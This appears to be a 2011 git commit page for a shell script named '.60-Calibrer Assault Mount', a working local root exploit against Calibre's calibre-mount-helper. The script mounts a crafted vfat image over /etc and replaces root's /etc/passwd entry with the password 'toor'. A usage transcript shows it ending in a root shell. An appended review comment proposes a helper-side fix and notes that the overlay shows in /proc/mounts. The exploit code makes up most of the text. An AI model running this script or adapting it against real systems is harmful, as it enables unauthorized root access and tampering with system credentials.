authorJason A. Donenfeld <Jason@zx2c4.com>2011-11-02 20:07:49 -0400
committerJason A. Donenfeld <Jason@zx2c4.com>2011-11-02 20:07:49 -0400
commit20c8287ccc88a597a3e5c8d497273d28b3f7a0d1 (patch)
tree8862ad289945c24dabda8a5916a1deac7be643b6
parentInitial commit. (diff)
downloadcalibre-mount-helper-exploit-20c8287ccc88a597a3e5c8d497273d28b3f7a0d1.tar.xz
calibre-mount-helper-exploit-20c8287ccc88a597a3e5c8d497273d28b3f7a0d1.zip
Add 60 calibrer.
-rwxr-xr-x60calibrerassaultmount.sh74
1 files changed, 74 insertions, 0 deletions
diff --git a/60calibrerassaultmount.sh b/60calibrerassaultmount.sh
new file mode 100755
index 0000000..fb25104
--- /dev/null
+++ b/60calibrerassaultmount.sh
@@ -0,0 +1,74 @@
+#!/bin/sh
+
+ #######################################
+ # .60-Calibrer Assault Mount #
+ # by zx2c4 #
+ #######################################
+
+################################################################################
+# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
+# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
+# more fundumental issue with Calibre's mount helper -- namely, that it allows
+# us to mount a vfat filesystem anywhere we want. By mounting a file system
+# image over /etc, we are able to tinker /etc/passwd and make the root password
+# temporarily "toor".
+#
+# - zx2c4
+# 2011-11-2
+#
+# Usage:
+# $ ./60calibrerassaultmount.sh
+# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
+# [+] Making overlay image:
+# 51200+0 records in
+# 51200+0 records out
+# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
+# mkfs.vfat 3.0.11 (24 Dec 2010)
+# [+] Mounting overlay image using calibre-mount-helper.
+# [+] Copying /etc into overlay.
+# [+] Tampering with overlay's passwd.
+# [+] Unmounting overlay image using calibre-mount-helper.
+# [+] Mounting overlay to /etc using calibre-mount-helper.
+# [+] Asking for root. When prompted for a password, enter 'toor'.
+# Password: [typed in toor to the terminal]
+# [+] Unmounting /etc using root umount.
+# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
+# [+] Getting shell.
+# sh-4.2# id
+# uid=0(root) gid=0(root) groups=0(root)
+# sh-4.2# whoami
+# root
+# sh-4.2#
+################################################################################
+
+
+echo "#######################################"
+echo "# .60-Calibrer Assault Mount #"
+echo "# by zx2c4 #"
+echo "#######################################"
+echo
+echo -n "[+] Making temporary directory: "
+dir="$(mktemp -d)"
+echo "$dir"
+cd "$dir"
+echo "[+] Making overlay image:"
+dd if=/dev/zero of=overlay count=51200
+/usr/sbin/mkfs.vfat overlay
+echo "[+] Mounting overlay image using calibre-mount-helper."
+mkdir staging
+calibre-mount-helper mount overlay staging
+echo "[+] Copying /etc into overlay."
+cd staging/
+cp -a /etc/* . 2>/dev/null
+echo "[+] Tampering with overlay's passwd."
+cat passwd | tail -n +2 > tmp
+echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
+mv tmp passwd
+echo "[+] Unmounting overlay image using calibre-mount-helper."
+cd ..
+calibre-mount-helper eject overlay staging >/dev/null 2>&1
+echo "[+] Mounting overlay to /etc using calibre-mount-helper."
+calibre-mount-helper mount overlay /etc >/dev/null 2>&1
+cd /
+echo "[+] Asking for root. When prompted for a password, enter 'toor'."
+su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; exec /bin/sh"
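Review bot: The header comment at lines 30–35 names the root cause — the helper mounts a caller-chosen image at a caller-chosen mount point — but leaves the helper-side remediation undocumented, which is the part anyone maintaining or auditing such a helper needs from this write-up. A one-line addition after line 35 such as `# Helper-side fix: the mount point must be a fresh directory the helper itself creates under a path it owns; a caller-supplied target (here /etc) must be rejected outright.` would close that gap. It is also worth recording next to the Usage transcript that while the overlay is in place the mount over /etc is visible in /proc/mounts (and presumably in any mount auditing the host does), so the condition is detectable, not silent. The script body is a flat top-level run that ends at the hunk's last line.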